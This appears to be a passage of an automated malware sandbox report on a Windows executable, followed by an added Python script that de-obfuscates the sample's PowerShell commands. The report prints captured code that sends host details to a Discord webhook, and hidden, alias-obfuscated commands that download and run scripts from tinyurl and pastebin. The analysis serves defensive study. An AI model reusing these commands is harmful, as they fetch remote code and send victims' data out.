                                            2024-10-15 14:08:40 UTC | 1378 bytes | IN | Data Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                            Data Ascii (line breaks restored from the 0a bytes):
                                            sleep 5
                                            rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Force
                                            sleep 5


                                            $googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                            if (-Not (Test-Path $googoogaagaa)) {
                                            rm $env:tmp\onedrivefilesync.dll -force
                                            New-ItemPropert
                                            2024-10-15 14:08:40 UTC | 1378 bytes | IN | Data Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                            Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                            2024-10-15 14:08:40 UTC | 1378 bytes | IN | Data Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                            Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                            2024-10-15 14:08:40 UTC | 1378 bytes | IN | Data Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                            Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                            2024-10-15 14:08:40 UTC | 1378 bytes | IN | Data Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                            Data Ascii (line breaks restored from the 0a bytes):
                                            cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors

                                            # Retrieve GPU information
                                            $gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                            2024-10-15 14:08:40 UTC | 618 bytes | IN | Data Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                            Data Ascii (line breaks restored from the 0a bytes):
                                            ======================
                                            "@
                                            } | ConvertTo-Json

                                            # Send the POST request to the webhook URL
                                            try {
                                                Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json"
                                                Write-Output "Message sent successfully."
                                            } catch {
                                                W


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            6 | 192.168.2.8 | 49718 | 162.159.136.232 | 443 | 5632 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-10-15 14:08:45 UTC | 311 bytes | OUT | POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Content-Type: application/json
                                            Host: discord.com
                                            Content-Length: 297
                                            Connection: Keep-Alive
                                            2024-10-15 14:08:45 UTC | 297 bytes | OUT | Data Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 68 75 62 65 72 74 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 34 41 4d 41 47 4b 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46
                                            Data Ascii (line breaks restored from the 0d 0a bytes):
                                            {
                                                "content":  "================================\n**user** system online\n\n**GPU:** 4AMAGK\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - F
                                            2024-10-15 14:08:45 UTC | 1255 bytes | IN | HTTP/1.1 404 Not Found
                                            Date: Tue, 15 Oct 2024 14:08:45 GMT
                                            Content-Type: application/json
                                            Content-Length: 45
                                            Connection: close
                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                            x-ratelimit-limit: 5
                                            x-ratelimit-remaining: 4
                                            x-ratelimit-reset: 1729001327
                                            x-ratelimit-reset-after: 1
                                            via: 1.1 google
                                            alt-svc: h3=":443"; ma=86400
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pSkkG8F3pujVaSVtAZIfG9Ht4OEei7Zmhhany3VCo55doCiXyXcD1SO%2FNDaW%2BPKChxlEjfMmFJgxwKns8obO%2Bct5hzfVIQdZtKEBO5ADYUdqCSyz2EyLB0QA1eEg"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            X-Content-Type-Options: nosniff
                                            Set-Cookie: __cfruid=6037ab852f611d9c59da53270f9ef9f7968de046-1729001325; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                            Set-Cookie: _cfuvid=ISHjpiQsrSxXfPR9ENjK_tyB.Jn36.Se.X6qJjfRW80-1729001325730-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                            Server: cloudflare
                                            CF-RAY: 8d30620d3f354750-DFW
                                            2024-10-15 14:08:45 UTC | 45 bytes | IN | Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            7 | 192.168.2.8 | 49719 | 162.159.136.232 | 443 | 5336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-10-15 14:08:53 UTC | 311 bytes | OUT | POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Content-Type: application/json
                                            Host: discord.com
                                            Content-Length: 297
                                            Connection: Keep-Alive
                                            2024-10-15 14:08:53 UTC | 297 bytes | OUT | Data Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 68 75 62 65 72 74 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 34 41 4d 41 47 4b 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46
                                            Data Ascii (line breaks restored from the 0d 0a bytes):
                                            {
                                                "content":  "================================\n**user** system online\n\n**GPU:** 4AMAGK\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - F
                                            2024-10-15 14:08:53 UTC | 1261 bytes | IN | HTTP/1.1 404 Not Found
                                            Date: Tue, 15 Oct 2024 14:08:53 GMT
                                            Content-Type: application/json
                                            Content-Length: 45
                                            Connection: close
                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                            x-ratelimit-limit: 5
                                            x-ratelimit-remaining: 4
                                            x-ratelimit-reset: 1729001335
                                            x-ratelimit-reset-after: 1
                                            via: 1.1 google
                                            alt-svc: h3=":443"; ma=86400
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L%2BaLmMdDzGUHXS%2F5%2FOVkC%2BecgwBoqf6IlMnSk0nEi1bkArecnSldedeFAa%2F2Cz9pGCUB2fOVHfAPaF4dksBXiSRfh3Egn6wUrw%2F7MuuOnEvWaIAcsKpIsXQDY3tn"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            X-Content-Type-Options: nosniff
                                            Set-Cookie: __cfruid=3cc8826b8e129a25e091786ff5323dda09268d5c-1729001333; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                            Set-Cookie: _cfuvid=l0qBvyRSAKsNlkkIOvi66k6mtMXweaE6.S7EcWQGQu8-1729001333690-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                            Server: cloudflare
                                            CF-RAY: 8d30623eec3f463e-DFW
                                            2024-10-15 14:08:53 UTC | 45 bytes | IN | Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                            Target ID:0
                                            Start time:10:07:55
                                            Start date:15/10/2024
                                            Path:C:\Users\user\Desktop\vF20HtY4a4.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\Desktop\vF20HtY4a4.exe"
                                            Imagebase:0x1fd048b0000
                                            File size:24'064 bytes
                                            MD5 hash:D17A39CA8331A4CE65261B1B6DC7E6AC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:false

                                            Target ID:1
                                            Start time:10:07:55
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6ee680000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:3
                                            Start time:10:07:56
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing)
                                            Imagebase:0x7ff6cb6b0000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:10:07:56
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6ee680000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:6
                                            Start time:10:08:27
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\forfiles.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                            Imagebase:0x7ff78b7e0000
                                            File size:52'224 bytes
                                            MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:7
                                            Start time:10:08:27
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6ee680000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:8
                                            Start time:10:08:27
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                            Imagebase:0x7ff6cb6b0000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:9
                                            Start time:10:08:28
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                            Imagebase:0x7ff7194a0000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:10
                                            Start time:10:08:29
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\attrib.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                            Imagebase:0x7ff60df50000
                                            File size:23'040 bytes
                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:11
                                            Start time:10:08:35
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\forfiles.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                            Imagebase:0x7ff78b7e0000
                                            File size:52'224 bytes
                                            MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:12
                                            Start time:10:08:35
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7d0b40000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:13
                                            Start time:10:08:35
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                            Imagebase:0x7ff6cb6b0000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:14
                                            Start time:10:08:36
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                            Imagebase:0x7ff6cb6b0000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

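The three PowerShell command lines above (Target IDs 11, 13 and 14) hide a plain download cradle behind Set-Alias: `sal callit iEx` makes callit an alias for iex (Invoke-Expression), `sal $env:os iWr` makes an alias named after the value of $env:OS for iwr (Invoke-WebRequest), and `sal fatbake calc` is a decoy that is never invoked. The Python script below is an added triage example; it is not part of the Joe Sandbox report or of the sample. It pulls the script out of the innermost -command argument, resolves user-defined and built-in aliases, and flags the canonical result. It assumes $env:OS is Windows_NT (the documented value on NT-based Windows) and the Windows PowerShell 5.1 default aliases iex, iwr, irm, curl and wget; the two malicious command lines are copied from the process list, the benign control line is constructed.

```python
"""Resolve Set-Alias obfuscation in captured PowerShell command lines.

Added triage helper; not part of the Joe Sandbox report or of the sample.
"""
import re

# Windows PowerShell 5.1 default aliases relevant to download cradles.
BUILTIN_ALIASES = {
    "iex": "Invoke-Expression",
    "iwr": "Invoke-WebRequest",
    "curl": "Invoke-WebRequest",
    "wget": "Invoke-WebRequest",
    "irm": "Invoke-RestMethod",
}

# Assumption: $env:OS on the analysed host is 'Windows_NT', the documented
# value on every NT-based Windows release.
DEFAULT_ENV = {"os": "Windows_NT"}

ALIAS_STMT = re.compile(
    r"^\s*(?:sal|nal|set-alias|new-alias)\s+(\S+)\s+(\S+)\s*$", re.IGNORECASE)
TOKEN = re.compile(r"[A-Za-z_][\w-]*")

# Command lines copied from the process list (Target IDs 11 and 14) plus one
# constructed benign control that is not from the report.
FORFILES_CMD = (
    '"C:\\Windows\\System32\\forfiles.exe" /p c:\\windows\\system32 /m notepad.exe '
    '/c "powershell.exe -command powershell -windowstyle h -command '
    "'sal fatbake calc;sal callit iEx; sal $env:os iWr; "
    "calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'\""
)
POWERSHELL_CMD = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -windowstyle h '
    '-command "sal fatbake calc;sal callit iEx; sal $env:os iWr; '
    'calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"'
)
BENIGN_CMD = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -NoProfile '
    '-Command "Get-ChildItem C:\\Temp"'
)


def extract_script(cmdline):
    """Return the script handed to the innermost -command / -c, unquoted.

    The forfiles wrapper nests 'powershell.exe -command powershell ...
    -command <script>', so the text after the last -command is the payload.
    """
    parts = re.split(r"-c(?:ommand)?\b\s*", cmdline, flags=re.IGNORECASE)
    return parts[-1].strip().strip("\"'") if len(parts) > 1 else ""


def resolve_aliases(script, env=None):
    """Drop alias definitions and rewrite the rest with canonical cmdlet names."""
    env = env or DEFAULT_ENV
    aliases, body = {}, []
    for stmt in script.split(";"):
        m = ALIAS_STMT.match(stmt)
        if not m:
            if stmt.strip():
                body.append(stmt.strip())
            continue
        name, target = m.groups()
        if name.lower().startswith("$env:"):      # alias named after an env var
            name = env.get(name[5:].lower(), name)
        aliases[name.lower()] = target

    def canonical(tok):
        # Follow alias -> alias chains, bounded so 'sal a b; sal b a' terminates.
        seen = set()
        while tok.lower() in aliases and tok.lower() not in seen:
            seen.add(tok.lower())
            tok = aliases[tok.lower()]
        return BUILTIN_ALIASES.get(tok.lower(), tok)

    resolved = {name: canonical(name) for name in aliases}
    # Token-level substitution: adequate for triage, but it also rewrites
    # matching words inside string literals.
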